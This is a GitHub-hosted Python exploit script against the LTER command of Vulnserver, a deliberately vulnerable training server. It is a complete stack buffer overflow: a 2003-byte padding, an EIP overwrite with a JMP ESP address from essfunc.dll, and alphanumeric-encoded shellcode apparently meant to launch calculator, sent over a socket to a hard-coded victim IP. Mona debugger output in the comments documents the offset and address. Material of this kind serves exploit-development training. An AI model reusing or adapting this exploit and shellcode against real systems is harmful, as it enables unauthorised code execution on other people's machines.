ShellCode/Vulnserver-LTER-alphanumeric.py at master · Mrnmap/ShellCode · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import socket
from struct import pack

victim_host = "10.0.0.17"
victim_port = 9999

# EIP overwritten after sending cyclic pattern and calculated offset - !mona findmsp
# Log data, item 17
# Address=0BADF00D
# Message=    EIP contains normal pattern : 0x386f4337 (offset 2003)

# Unicode JMP ESP - !mona jmp -r esp
# Log data, item 4
# Address=62501203
# Message=  0x62501203 : jmp esp | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\john\Desktop\vulnserver-master\essfunc.dll)

shellcode_calc =  ""
shellcode_calc += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode_calc += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
shellcode_calc += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
shellcode_calc += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode_calc += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
shellcode_calc += "\x4a\x49\x79\x6c\x48\x68\x6f\x72\x73\x30"
shellcode_calc += "\x65\x50\x57\x70\x61\x70\x6d\x59\x79\x75"
shellcode_calc += "\x65\x61\x4f\x30\x62\x44\x6e\x6b\x32\x70"
shellcode_calc += "\x50\x30\x6e\x6b\x50\x52\x46\x6c\x6e\x6b"
shellcode_calc += "\x52\x72\x46\x74\x6e\x6b\x70\x72\x74\x68"
shellcode_calc += "\x36\x6f\x6f\x47\x53\x7a\x66\x46\x75\x61"
shellcode_calc += "\x79\x6f\x6e\x4c\x37\x4c\x51\x71\x63\x4c"
shellcode_calc += "\x77\x72\x76\x4c\x61\x30\x49\x51\x38\x4f"
shellcode_calc += "\x56\x6d\x67\x71\x4a\x67\x4d\x32\x39\x62"
shellcode_calc += "\x50\x52\x53\x67\x6e\x6b\x43\x62\x34\x50"
shellcode_calc += "\x4e\x6b\x63\x7a\x77\x4c\x6e\x6b\x70\x4c"
shellcode_calc += "\x32\x31\x53\x48\x69\x73\x72\x68\x65\x51"
shellcode_calc += "\x4e\x31\x72\x71\x6c\x4b\x73\x69\x67\x50"
shellcode_calc += "\x36\x61\x4e\x33\x4e\x6b\x53\x79\x64\x58"
shellcode_calc += "\x6d\x33\x57\x4a\x31\x59\x4e\x6b\x66\x54"
shellcode_calc += "\x6c\x4b\x57\x71\x48\x56\x35\x61\x4b\x4f"
shellcode_calc += "\x4e\x4c\x6b\x71\x6a\x6f\x54\x4d\x57\x71"
shellcode_calc += "\x78\x47\x47\x48\x69\x70\x50\x75\x69\x66"
shellcode_calc += "\x53\x33\x63\x4d\x48\x78\x45\x6b\x43\x4d"
shellcode_calc += "\x35\x74\x42\x55\x7a\x44\x62\x78\x6c\x4b"
shellcode_calc += "\x50\x58\x54\x64\x53\x31\x69\x43\x53\x56"
shellcode_calc += "\x4e\x6b\x76\x6c\x70\x4b\x6c\x4b\x71\x48"
shellcode_calc += "\x35\x4c\x75\x51\x7a\x73\x6c\x4b\x55\x54"
shellcode_calc += "\x4e\x6b\x37\x71\x7a\x70\x6c\x49\x33\x74"
shellcode_calc += "\x51\x34\x44\x64\x71\x4b\x33\x6b\x73\x51"
shellcode_calc += "\x66\x39\x43\x6a\x52\x71\x4b\x4f\x4d\x30"
shellcode_calc += "\x71\x4f\x31\x4f\x70\x5a\x4c\x4b\x52\x32"
shellcode_calc += "\x5a\x4b\x4e\x6d\x53\x6d\x30\x6a\x47\x71"
shellcode_calc += "\x6c\x4d\x6e\x65\x6e\x52\x73\x30\x53\x30"
shellcode_calc += "\x47\x70\x36\x30\x75\x38\x36\x51\x6e\x6b"
shellcode_calc += "\x62\x4f\x4f\x77\x6b\x4f\x49\x45\x6d\x6b"
shellcode_calc += "\x58\x70\x6d\x65\x6e\x42\x62\x76\x75\x38"
shellcode_calc += "\x6f\x56\x4f\x65\x6d\x6d\x6f\x6d\x59\x6f"
shellcode_calc += "\x4e\x35\x65\x6c\x77\x76\x71\x6c\x47\x7a"
shellcode_calc += "\x6b\x30\x59\x6b\x59\x70\x42\x55\x76\x65"
shellcode_calc += "\x4f\x4b\x73\x77\x44\x53\x64\x32\x52\x4f"
shellcode_calc += "\x33\x5a\x57\x70\x51\x43\x4b\x4f\x4e\x35"
shellcode_calc += "\x63\x53\x70\x61\x50\x6c\x62\x43\x74\x6e"
shellcode_calc += "\x75\x35\x50\x78\x32\x45\x67\x70\x41\x41"


exploit_payload  = "LTER /.:/"
exploit_payload += "A" * 2003
exploit_payload += pack('I', 0x62501203) # Unicode JMP ESP
exploit_payload += shellcode_calc

try:
	expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	print("[x] Setting up a IPV4 socket connection\n")
	expl.connect((victim_host, victim_port))
	print(expl.recv(1024))
	print("[x] Connected to the victim host")
	expl.send(exploit_payload)
	print(expl.recv(1024))
	print("[x] Malicious payload sent...")
except:
	print("[!] Error runnning exploit against target")